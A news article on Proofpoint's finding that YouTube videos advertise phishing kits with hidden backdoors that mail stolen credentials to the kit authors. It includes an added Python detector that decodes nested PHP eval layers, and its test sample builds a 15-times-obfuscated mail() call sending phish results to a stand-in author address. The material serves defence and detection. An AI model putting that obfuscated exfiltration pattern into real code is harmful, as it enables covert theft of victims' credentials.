Scammers are using YouTube videos to advertise phishing templates secretly equipped with backdoors that send stolen information to the authors.
Researchers at security firm Proofpoint found numerous YouTube videos with links to phishing kits and templates. A simple search for “PayPal scama” alone yielded more than 100,000 results.
Each of those videos is designed to illustrate how a template looks and how it collects unsuspecting users’ information. The following advertisement for an Amazon phishing template proves that point:
But there’s more than meets the eye with the video. As the researchers explain in a blog post:
“When we decoded the sample, we found that the author’s Gmail address was hardcoded to receive the results of the phish every time the kit was used, regardless of who used it.
“In this same kit, we also found a secondary email receiving the stolen results. It is unclear if this is the same author as the first or if someone else added it and then redistributed the kit.”
Of course, the kits’ authors don’t want buyers to know they’re absconding with the fruits of their phishing campaigns. They therefore take precautions to avoid raising suspicions.
For instance, with one PayPal phishing kit, the authors hid their secret command behind PHP code that’s been encoded 15 times.
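A static check for the hidden-recipient pattern described above, as an added example that is not from Proofpoint or the original article. It assumes each layer has the form `eval(decoder(...('<base64>')))` built from common PHP decoders, which the article does not specify; the sample kit and all addresses are constructed.

```python
import base64, codecs, re, zlib

# Assumed layer shape (the page does not give it): eval(f1(f2('<base64>')));
LAYER = re.compile(r"eval\(\s*((?:\w+\s*\(\s*)+)(['\"])([A-Za-z0-9+/=\s]+)\2[\s)]*;")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE stream
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}

def peel(php, max_layers=50):
    """Statically unwrap nested eval() layers; the PHP is never executed."""
    layers = 0
    while layers < max_layers:  # bound the loop on hostile input
        m = LAYER.search(php)
        if not m:
            break
        data = m.group(3).encode()
        # Functions are written outermost first, so apply them right to left.
        for name in reversed(re.findall(r"\w+", m.group(1))):
            data = DECODERS[name.lower()](data)  # KeyError = unknown wrapper
        php = php[:m.start()] + data.decode("utf-8", "replace") + php[m.end():]
        layers += 1
    return php, layers

def hidden_recipients(php):
    """Addresses that only appear once the encoded layers are removed."""
    clear, layers = peel(php)
    return set(EMAIL.findall(clear)) - set(EMAIL.findall(php)), layers

def build_sample(depth=15):
    """Constructed test input: a mail() call wrapped `depth` times."""
    body = 'mail("kit-author@example.com", "rezult", $msg);'
    for _ in range(depth):
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        raw = c.compress(body.encode()) + c.flush()
        body = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()
    return '<?php\n$to = "buyer@example.net";\nmail($to, "login", $msg);\n' + body

if __name__ == "__main__":
    found, layers = hidden_recipients(build_sample())
    print(f"{layers} layers removed, hidden recipients: {sorted(found)}")
```

Any address that shows up only after decoding is worth recording as an indicator, since it identifies a recipient the kit's visible configuration does not disclose.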
Proofpoint’s researchers found that phishing videos are a persistent problem on YouTube:
“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software.”
It’s up to YouTube to develop better measures that will empower its security teams to stem the tide of these videos.
In the meantime, organizations should take responsibility for educating their workforce about how to spot a phish. They can do so with the help of third-party security awareness training software.